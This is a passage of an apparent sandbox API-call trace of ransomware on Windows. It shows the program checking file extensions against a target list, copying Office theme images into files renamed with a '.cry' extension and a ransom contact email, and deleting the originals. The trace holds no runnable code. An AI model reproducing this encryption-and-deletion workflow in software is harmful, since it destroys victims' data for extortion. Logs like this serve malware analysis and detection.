Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.444] lstrlenW (lpString=".1cd") returned 4 [0044.444] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.444] lstrlenW (lpString=".jpg") returned 4 [0044.444] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.444] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.444] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.445] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=43276) returned 1 [0044.445] CloseHandle (hObject=0x188) returned 1 [0044.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20 [0044.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.445] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.445] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.446] GetLastError () returned 0x0 [0044.446] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xa90c, lpOverlapped=0x0) returned 1 [0044.524] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xa910, lpOverlapped=0x0) returned 1 [0044.526] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.526] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.526] SetEndOfFile (hFile=0x1fc) returned 1 [0044.526] CloseHandle (hObject=0x1fc) returned 1 [0044.526] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.526] SetEndOfFile (hFile=0x188) returned 1 [0044.536] CloseHandle (hObject=0x188) returned 1 [0044.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.536] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0044.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.537] lstrlenW (lpString=".doc") returned 4 [0044.537] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.537] lstrlenW (lpString=".docx") returned 5 [0044.537] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.537] lstrlenW (lpString=".pdf") returned 4 [0044.578] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.578] lstrlenW (lpString=".xls") returned 4 [0044.578] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.578] lstrlenW (lpString=".xlsx") returned 5 [0044.578] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.578] lstrlenW (lpString=".ppt") returned 4 [0044.578] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.578] lstrlenW (lpString=".zip") returned 4 [0044.578] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.578] lstrlenW (lpString=".rar") returned 4 [0044.579] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.579] lstrlenW (lpString=".bz2") returned 4 [0044.579] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString=".7z") returned 3 [0044.579] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString=".dbf") returned 4 [0044.579] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString=".1cd") returned 4 [0044.579] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString=".jpg") returned 4 [0044.579] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString=".doc") returned 4 [0044.579] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString=".docx") returned 5 [0044.579] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.579] lstrlenW (lpString=".pdf") returned 4 [0044.579] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString=".xls") returned 4 [0044.579] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.579] lstrlenW (lpString=".xlsx") returned 5 [0044.579] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.579] lstrlenW (lpString=".ppt") returned 4 [0044.579] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.579] lstrlenW (lpString=".zip") returned 4 [0044.579] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.579] lstrlenW (lpString=".rar") returned 4 [0044.579] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.579] lstrlenW (lpString=".bz2") returned 4 [0044.579] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.579] lstrlenW (lpString=".7z") returned 3 [0044.579] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.580] lstrlenW (lpString=".dbf") returned 4 [0044.580] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.580] lstrlenW (lpString=".1cd") returned 4 [0044.580] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.580] lstrlenW (lpString=".jpg") returned 4 [0044.580] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.580] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.580] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0044.705] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2044) returned 1 [0044.705] CloseHandle (hObject=0x1ec) returned 1 [0044.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20 [0044.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0044.705] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.705] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0044.707] GetLastError () returned 0x0 [0044.707] ReadFile (in: hFile=0x1ec, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x7fc, lpOverlapped=0x0) returned 1 [0044.960] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x800, lpOverlapped=0x0) returned 1 [0044.961] ReadFile (in: hFile=0x1ec, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.961] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.961] SetEndOfFile (hFile=0x194) returned 1 [0044.962] CloseHandle (hObject=0x194) returned 1 [0044.962] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.962] SetEndOfFile (hFile=0x1ec) returned 1 [0044.962] CloseHandle (hObject=0x1ec) returned 1 [0044.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.963] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1 [0044.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.963] lstrlenW (lpString=".doc") returned 4 [0044.963] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.963] lstrlenW (lpString=".docx") returned 5 [0044.963] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.963] lstrlenW (lpString=".pdf") returned 4 [0044.963] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.963] lstrlenW (lpString=".xls") returned 4 [0044.963] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.963] lstrlenW (lpString=".xlsx") returned 5 [0044.963] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.963] lstrlenW (lpString=".ppt") returned 4 [0044.963] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.963] lstrlenW (lpString=".zip") returned 4 [0044.963] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.963] lstrlenW (lpString=".rar") returned 4 [0044.963] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.963] lstrlenW (lpString=".bz2") returned 4 [0044.963] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.963] lstrlenW (lpString=".7z") returned 3 [0044.963] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.963] lstrlenW (lpString=".dbf") returned 4 [0044.963] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.963] lstrlenW (lpString=".1cd") returned 4 [0044.963] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".jpg") returned 4 [0044.964] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".doc") returned 4 [0044.964] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.964] lstrlenW (lpString=".docx") returned 5 [0044.964] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.964] lstrlenW (lpString=".pdf") returned 4 [0044.964] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString=".xls") returned 4 [0044.964] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString=".xlsx") returned 5 [0044.964] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.964] lstrlenW (lpString=".ppt") returned 4 [0044.964] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".zip") returned 4 [0044.964] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString=".rar") returned 4 [0044.964] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.964] lstrlenW (lpString=".bz2") returned 4 [0044.964] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.964] lstrlenW (lpString=".7z") returned 3 [0044.964] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".dbf") returned 4 [0044.964] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".1cd") returned 4 [0044.964] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.964] lstrlenW (lpString=".jpg") returned 4 [0044.964] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.965] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.965] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.020] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=33277) returned 1 [0045.020] CloseHandle (hObject=0x178) returned 1 [0045.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20 [0045.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.020] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.020] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.021] GetLastError () returned 0x0 [0045.021] ReadFile (in: hFile=0x178, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x81fd, lpOverlapped=0x0) returned 1 [0045.023] WriteFile (in: hFile=0x1ac, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x8200, lpOverlapped=0x0) returned 1 [0045.024] ReadFile (in: hFile=0x178, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.024] WriteFile (in: hFile=0x1ac, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.024] SetEndOfFile (hFile=0x1ac) returned 1 [0045.024] CloseHandle (hObject=0x1ac) returned 1 [0045.024] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.024] SetEndOfFile (hFile=0x178) returned 1 [0045.025] CloseHandle (hObject=0x178) returned 1 [0045.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.025] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString=".doc") returned 4 [0045.026] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.026] lstrlenW (lpString=".docx") returned 5 [0045.026] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.026] lstrlenW (lpString=".pdf") returned 4 [0045.026] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.026] lstrlenW (lpString=".xls") returned 4 [0045.026] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.026] lstrlenW (lpString=".xlsx") returned 5 [0045.026] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.026] lstrlenW (lpString=".ppt") returned 4 [0045.026] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString=".zip") returned 4 [0045.026] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.026] lstrlenW (lpString=".rar") returned 4 [0045.026] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.026] lstrlenW (lpString=".bz2") returned 4 [0045.026] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.026] lstrlenW (lpString=".7z") returned 3 [0045.026] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString=".dbf") returned 4 [0045.026] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString=".1cd") returned 4 [0045.026] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.026] lstrlenW (lpString=".jpg") returned 4 [0045.026] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.027] lstrlenW (lpString=".doc") returned 4 [0045.027] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString=".docx") returned 5 [0045.027] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.027] lstrlenW (lpString=".pdf") returned 4 [0045.027] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString=".xls") returned 4 [0045.027] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.027] lstrlenW (lpString=".xlsx") returned 5 [0045.027] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.027] lstrlenW (lpString=".ppt") returned 4 [0045.027] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.027] lstrlenW (lpString=".zip") returned 4 [0045.027] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.027] lstrlenW (lpString=".rar") returned 4 [0045.027] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.027] lstrlenW (lpString=".bz2") returned 4 [0045.027] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString=".7z") returned 3 [0045.027] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 